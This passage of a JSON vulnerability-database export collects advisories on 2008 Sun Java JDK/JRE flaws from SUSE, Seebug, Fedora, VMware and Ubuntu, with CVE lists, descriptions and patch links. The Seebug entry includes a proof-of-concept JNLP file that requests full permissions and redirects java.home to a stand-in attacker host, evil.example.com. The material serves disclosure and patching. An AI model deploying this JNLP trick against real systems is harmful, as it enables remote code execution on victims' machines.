(CVE-2008-5360, CVE-2008-5359, CVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344, CVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340, CVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354, CVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350, CVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345, CVE-2008-5346)\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-01-09T15:49:38", "published": "2009-01-09T15:49:38", "id": "SUSE-SA:2009:001", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00001.html", "type": "suse", "title": "remote code execution in Sun Java", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:19:48", "description": "BUGTRAQ ID: 32620,32608\r\nCVE(CAN) ID: CVE-2008-5339,CVE-2008-5340,CVE-2008-5341,CVE-2008-5342,CVE-2008-5343,CVE-2008-5344,CVE-2008-5345,CVE-2008-5346,CVE-2008-5347,CVE-2008-5348,CVE-2008-5349,CVE-2008-5350,CVE-2008-5351,CVE-2008-5352,CVE-2008-5353,CVE-2008-5354,CVE-2008-5355,CVE-2008-5356,CVE-2008-5357,CVE-2008-5358,CVE-2008-5359,CVE-2008-5360,CVE-2008-2086\r\n\r\nSolaris\u7cfb\u7edf\u7684Java\u8fd0\u884c\u65f6\u73af\u5883\uff08JRE\uff09\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u3002 \r\n\r\nSun Java\u4e2d\u7684\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u6076\u610f\u7528\u6237\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3001\u6cc4\u9732\u7cfb\u7edf\u4fe1\u606f\u3001\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u6709\u6f0f\u6d1e\u7684\u7cfb\u7edf\u3002\r\n\r\n1) JRE\u521b\u5efa\u4e86\u540d\u79f0\u4e0d\u8fc7\u968f\u673a\u7684\u4e34\u65f6\u6587\u4ef6\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u5199\u5165\u4efb\u610fJAR\u6587\u4ef6\u5e76\u6267\u884c\u6709\u9650\u7684\u64cd\u4f5c\u3002\r\n\r\n2) Java 
AWT\u5e93\u5728\u5904\u7406\u56fe\u5f62\u6a21\u578b\u65f6\u5b58\u5728\u9519\u8bef\uff0c\u5728ConvolveOp\u64cd\u4f5c\u4e2d\u4f7f\u7528\u7684\u7279\u5236Raster\u56fe\u5f62\u6a21\u578b\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n3) Java Web Start\u5728\u5904\u7406\u67d0\u4e9bGIF\u5934\u503c\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684splash logo\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u3002\r\n\r\n4) \u5904\u7406TrueType\u5b57\u4f53\u65f6\u7684\u6574\u6570\u6ea2\u51fa\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n5) JRE\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u521b\u5efa\u5230\u4efb\u610f\u4e3b\u673a\u7684\u7f51\u7edc\u8fde\u63a5\u3002\r\n\r\n6) \u542f\u52a8Java Web Start\u5e94\u7528\u7a0b\u5e8f\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684\u5e94\u7528\u7a0b\u5e8f\u4ee5\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n7) \u4e0d\u53ef\u4fe1\u4efb\u7684Java Web Start\u5e94\u7528\u7a0b\u5e8f\u53ef\u4ee5\u83b7\u53d6\u5f53\u524d\u7528\u6237\u540d\u548cJava Web Start\u7f13\u5b58\u7684\u4f4d\u7f6e\u3002\r\n\r\n8) Java Web Start\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684JNLP\u6587\u4ef6\u4fee\u6539\u7cfb\u7edf\u5c5e\u6027\uff0c\u5982java.home\u3001java.ext.dirs\u548cuser.home\u3002\r\n\r\n9) Java Web Start\u548cJava Plug-in\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u52ab\u6301HTTP\u4f1a\u8bdd\u3002\r\n\r\n10) JRE applet\u7c7b\u52a0\u8f7d\u529f\u80fd\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6\u548c\u521b\u5efa\u5230\u4efb\u610f\u4e3b\u673a\u7684\u7f51\u7edc\u8fde\u63a5\u3002\r\n\r\n11) Java Web Start BasicService\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6253\u5f00\u4efb\u610f\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n12) Java 
Update\u673a\u5236\u6ca1\u6709\u68c0\u67e5\u4e0b\u8f7d\u7684\u66f4\u65b0\u8f6f\u4ef6\u5305\u7684\u6570\u5b57\u7b7e\u540d\uff0c\u8fd9\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u4e2d\u95f4\u4eba\u6216DNS\u4f2a\u9020\u653b\u51fb\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n13) \u5728\u5904\u7406JAR\u6587\u4ef6\u7684Main-Class\u6e05\u5355\u9879\u65f6\u7684\u8fb9\u754c\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684JAR\u6587\u4ef6\u5bfc\u81f4\u6808\u6ea2\u51fa\u3002\r\n\r\n14) \u8fd8\u539f\u5e8f\u5217\u53f7\u65e5\u5386\u5bf9\u8c61\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684Java applet\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n15) JRE\u4e2d\u7684\u6574\u6570\u6ea2\u51fa\u53ef\u80fd\u5141\u8bb8\u901a\u8fc7\u7279\u5236\u7684Pack200\u538b\u7f29JAR\u6587\u4ef6\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\r\n\r\n16) UTF-8\u89e3\u7801\u5668\u63a5\u53d7\u957f\u4e8e\u6700\u77ed\u8868\u5355\u7684\u7f16\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u4f7f\u7528\u89e3\u7801\u5668\u7684\u5e94\u7528\u7a0b\u5e8f\u901a\u8fc7\u7279\u5236URI\u63a5\u53d7\u65e0\u6548\u7684\u5e8f\u5217\u548c\u6cc4\u9732\u654f\u611f\u4fe1\u606f\u3002\r\n\r\n17) JRE\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u5217\u51fa\u7528\u6237\u4e3b\u76ee\u5f55\u7684\u5185\u5bb9\u3002\r\n\r\n18) \u5904\u7406RSA\u516c\u94a5\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u6d88\u8017\u5927\u91cfCPU\u8d44\u6e90\u3002\r\n\r\n19) JRE Kerberos\u8ba4\u8bc1\u673a\u5236\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u8017\u5c3d\u64cd\u4f5c\u7cfb\u7edf\u8d44\u6e90\u3002\r\n\r\n20) JAX-WS\u548cJAXB JRE\u8f6f\u4ef6\u5305\u4e2d\u7684\u9519\u8bef\u53ef\u80fd\u5141\u8bb8\u4e0d\u53ef\u4fe1\u4efb\u7684Java applet\u8bfb\u5199\u6216\u6267\u884c\u672c\u5730\u6587\u4ef6\u3002\r\n\r\n21) \u5904\u7406ZIP\u6587\u4ef6\u65f6\u7684\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u6cc4\u9732\u4e3b\u673a\u8fdb\u7a0b\u7684\u4efb\u610f\u5185\u5b58\u4f4d\u7f6e\u3002\r\n\r\n22) 
\u4ece\u672c\u5730\u6587\u4ef6\u7cfb\u7edf\u6240\u52a0\u8f7d\u7684\u6076\u610f\u4ee3\u7801\u53ef\u80fd\u83b7\u53d6\u5bf9\u672c\u5730\u4e3b\u673a\u7684\u7f51\u7edc\u8bbf\u95ee\u3002\r\n\r\n23) \u5904\u7406TrueType\u5b57\u4f53\u65f6\u7684\u8fb9\u754c\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\n\nSun JDK <= 6 Update 10\r\nSun JDK <= 5.0 Update 16\r\nSun JRE <= 6 Update 10\r\nSun JRE <= 5.0 Update 16\r\nSun SDK 1.4.2\r\nSun SDK 1.3.1\n RedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2008:1025-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2008:1025-01\uff1aCritical: java-1.5.0-sun security update\r\n\u94fe\u63a5\uff1a<a href=https://www.redhat.com/support/errata/RHSA-2008-1025.html target=_blank>https://www.redhat.com/support/errata/RHSA-2008-1025.html</a>\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-246387\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-246387\uff1aA Security Vulnerability in the Java Runtime Environment may Allow Code Loaded From the Local Filesystem to Access LocalHost\r\n\u94fe\u63a5\uff1a<a href=http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1 target=_blank>http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-246387-1</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n<a href=http://java.sun.com/javase/downloads/index.jsp target=_blank>http://java.sun.com/javase/downloads/index.jsp</a>\r\n<a href=http://java.sun.com/javase/downloads/index_jdk5.jsp target=_blank>http://java.sun.com/javase/downloads/index_jdk5.jsp</a>\r\n<a href=http://java.sun.com/j2se/1.4.2/download.html target=_blank>http://java.sun.com/j2se/1.4.2/download.html</a>\r\n<a href=http://java.sun.com/j2se/1.3/download.html target=_blank>http://java.sun.com/j2se/1.3/download.html</a>", "published": "2008-12-09T00:00:00", "title": "Sun Java 
JDK/JRE\u5b89\u5168\u66f4\u65b0\u4fee\u590d\u591a\u4e2a\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5355", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "modified": "2008-12-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4532", "id": "SSV:4532", "sourceData": "\n <jnlp spec="1.0+" codebase="http://trusted.example.org/" href="evil.jnlp">\r\n <information>\r\n <title>Trusted Application</title>\r\n <vendor>Trusted Vendor</vendor>\r\n <description>Trusted Application by Trusted Vendor</description>\r\n <homepage href="http://trusted.example.org/" />\r\n <offline-allowed />\r\n </information>\r\n <security><all-permissions /></security>\r\n <resources>\r\n <j2se version="1.5+" />\r\n <!-- Next line overrides the JRE's java.home System property -->\r\n <property name="java.home" value="\\\\evil.example.com\\jre" />\r\n <jar href="signed-and-trusted-jce-dependent-library.jar" />\r\n </resources>\r\n <application-desc main-class="org.example.trusted.app.StartApp" />\r\n </jnlp>\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-4532"}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The OpenJDK runtime environment. 
", "modified": "2008-12-07T04:27:51", "published": "2008-12-07T04:27:51", "id": "FEDORA:F07BD208DD2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: java-1.6.0-openjdk-1.6.0.0-0.20.b09.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The OpenJDK runtime environment. ", "modified": "2008-12-07T04:33:22", "published": "2008-12-07T04:33:22", "id": "FEDORA:2B4E3208DD6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-7.b12.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:48", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2009-1095", "CVE-2009-1093", "CVE-2009-1104", "CVE-2008-5346", "CVE-2008-2136", "CVE-2009-1096", "CVE-2008-5339", "CVE-2009-1099", "CVE-2009-1097", "CVE-2008-5341", "CVE-2008-0598", "CVE-2008-5340", "CVE-2009-1893", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-3525", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2009-1100", "CVE-2008-5342", "CVE-2008-5353", "CVE-2009-1098", "CVE-2009-1094", "CVE-2009-0692", "CVE-2009-1106", "CVE-2008-5350", "CVE-2009-1103", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2009-1101", "CVE-2008-4210", "CVE-2008-3275", "CVE-2009-1107", "CVE-2007-6063", "CVE-2009-1102", "CVE-2008-5351", "CVE-2008-2812", "CVE-2009-1105"], "description": "a. Service Console update for DHCP and third party library update for DHCP client. 
\n \nDHCP is an Internet-standard protocol by which a computer can be \nconnected to a local network, ask to be given configuration \ninformation, and receive from a server enough information to \nconfigure itself as a member of that network.\n\n \nA stack-based buffer overflow in the script_write_params method in \nISC DHCP dhclient allows remote DHCP servers to execute arbitrary \ncode via a crafted subnet-mask option.\n\n \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) \nhas assigned the name CVE-2009-0692 to this issue.\n\n \nAn insecure temporary file use flaw was discovered in the DHCP \ndaemon's init script (\"/etc/init.d/dhcpd\"). A local attacker could \nuse this flaw to overwrite an arbitrary file with the output of the \n\"dhcpd -t\" command via a symbolic link attack, if a system \nadministrator executed the DHCP init script with the \"configtest\", \n\"restart\", or \"reload\" option.\n\n \nThe Common Vulnerabilities and Exposures Project (cve.mitre.org) \nhas assigned the name CVE-2009-1893 to this issue.\n\n \nThe following table lists what action remediates the vulnerability \nin the Service Console (column 4) if a solution is available. 
\n\n", "edition": 4, "modified": "2010-01-06T00:00:00", "published": "2009-10-16T00:00:00", "id": "VMSA-2009-0014", "href": "https://www.vmware.com/security/advisories/VMSA-2009-0014.html", "title": "VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues", "type": "vmware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "===========================================================\r\nUbuntu Security Notice USN-713-1 January 27, 2009\r\nopenjdk-6 vulnerabilities\r\nCVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350,\r\nCVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354,\r\nCVE-2008-5358, CVE-2008-5359, CVE-2008-5360\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 8.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 8.10:\r\n icedtea6-plugin 6b12-0ubuntu6.1\r\n openjdk-6-jdk 6b12-0ubuntu6.1\r\n openjdk-6-jre 6b12-0ubuntu6.1\r\n openjdk-6-jre-headless 6b12-0ubuntu6.1\r\n openjdk-6-jre-lib 6b12-0ubuntu6.1\r\n\r\nAfter a standard system upgrade you need to restart any Java applications\r\nto effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that Java did not correctly handle untrusted applets.\r\nIf a user were tricked into running a malicious applet, a remote attacker\r\ncould gain user privileges, or list directory contents. 
(CVE-2008-5347,\r\nCVE-2008-5350)\r\n\r\nIt was discovered that Kerberos authentication and RSA public key\r\nprocessing were not correctly handled in Java. A remote attacker\r\ncould exploit these flaws to cause a denial of service. (CVE-2008-5348,\r\nCVE-2008-5349)\r\n\r\nIt was discovered that Java accepted UTF-8 encodings that might be\r\nhandled incorrectly by certain applications. A remote attacker could\r\nbypass string filters, possibly leading to other exploits. (CVE-2008-5351)\r\n\r\nOverflows were discovered in Java JAR processing. If a user or\r\nautomated system were tricked into processing a malicious JAR file,\r\na remote attacker could crash the application, leading to a denial of\r\nservice. (CVE-2008-5352, CVE-2008-5354)\r\n\r\nIt was discovered that Java calendar objects were not unserialized safely.\r\nIf a user or automated system were tricked into processing a specially\r\ncrafted calendar object, a remote attacker could execute arbitrary code\r\nwith user privileges. (CVE-2008-5353)\r\n\r\nIt was discovered that the Java image handling code could lead to memory\r\ncorruption. If a user or automated system were tricked into processing\r\na specially crafted image, a remote attacker could crash the application,\r\nleading to a denial of service. (CVE-2008-5358, CVE-2008-5359)\r\n\r\nIt was discovered that temporary files created by Java had predictable\r\nnames. If a user or automated system were tricked into processing a\r\nspecially crafted JAR file, a remote attacker could overwrite sensitive\r\ninformation. 
(CVE-2008-5360)\r\n\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.diff.gz\r\n Size/MD5: 222090 25681e25a40ae36385d2429e8b905009\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.1.dsc\r\n Size/MD5: 2355 281bc682638116538e829499572e3cde\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12.orig.tar.gz\r\n Size/MD5: 54363262 f3aa01206f2192464b998fb7cc550686\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 8468244 7746db24f22ff25e7655bd9ad73b7077\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 4708568 3e9ffbcebcadc431e5c1a21b80e9a9b7\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 25619670 4eb18b9cdd11778e80ce6b1ac63c2040\r\n http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-source-files_6b12-0ubuntu6.1_all.deb\r\n Size/MD5: 49156890 044fa2fafc22c35568c01e46f85dbf0a\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 81028 8f3c35e45a001a5bb5e7d7231656e206\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 47370572 db9493bf071aa08183a7aeef6efc71ea\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 2366078 639ac32c62c5b951a77a0a58fcf8ee70\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 9942620 ac6600eb8cddc9afd55d37a646ba3a89\r\n 
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 24087518 d9b0e9f7a0f6df9392eed8c67fa77acd\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_amd64.deb\r\n Size/MD5: 241532 404e268000d8d15e903f67eb4383146e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 71520 9af6963e6ddc977bd05a8dbbe40f1139\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 101844924 fcdcbeacbb5f2854f68efa196e6d0ab3\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 2348616 6313881219ebbee2ee650685bcb6105f\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 9949838 366df23097c855e2d329dec6bf9f9d24\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 25169062 1354f7327a8df3422a442f37b357f77a\r\n http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_i386.deb\r\n Size/MD5: 230678 59ed425557f18fba815bcbf9b17c6d1d\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 72102 c3317b35cd38f7b4ab607bf49331e440\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 101930608 292954d99c81b528891824548c6b885e\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 2345410 fc2cd7ec4e96749e39307f756231fdc3\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 9945176 4a8fb4a2b021f7ce6729dca9b0eef67c\r\n 
http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 25192978 cccb11f6580b47ab30c981a0a8cea0f6\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_lpia.deb\r\n Size/MD5: 227450 abf58752fcf129175266e60b86857f8c\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 77056 790776ea3f41a2392e6c9666402428c0\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 35896200 55947cfd47a40e248a626adcb601b4da\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 2393068 c475228e916c602eea348b0382f51f21\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 8599254 97e338f60e55a488ef0ba06bc23cf414\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 22974726 e3bf13b8599a94a0b89f2757a90800f5\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_powerpc.deb\r\n Size/MD5: 255456 54b666eaaf464931a56406d09cfff088\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 70100 b4addb80ceb8e01dd8819a1bc3b8c89a\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 103684964 9f7150e6e1675831b723cdbae5b5c963\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 2355110 38f63636383fcb60ba60552ca4e0c60c\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 9927636 7c32c7c800f01a2dc1ae878eceade91d\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 
25175260 a09637fa2629b9ffa58d932078a44d67\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 232954 17e8a53c99ea3ac34c0018b2e60a2be8\r\n", "edition": 1, "modified": "2009-01-31T00:00:00", "published": "2009-01-31T00:00:00", "id": "SECURITYVULNS:DOC:21257", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21257", "title": "[USN-713-1] openjdk-6 vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:31", "bulletinFamily": "software", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "JNLP may overwrite system properties java.home\r\njava.ext.dirs\r\nuser.home\r\nHeap overflow and integer overflow on TrueType fonts parsing, memory corruption on GIF parsing, integer overflow on Pack200 decompression. Multiple sandbox protection bypass vulnerabilities.", "edition": 1, "modified": "2009-04-23T00:00:00", "published": "2009-04-23T00:00:00", "id": "SECURITYVULNS:VULN:9483", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9483", "title": "Sun Java JRE / JDK / Web Start multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:27:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "It was discovered that Java did not correctly handle untrusted applets. 
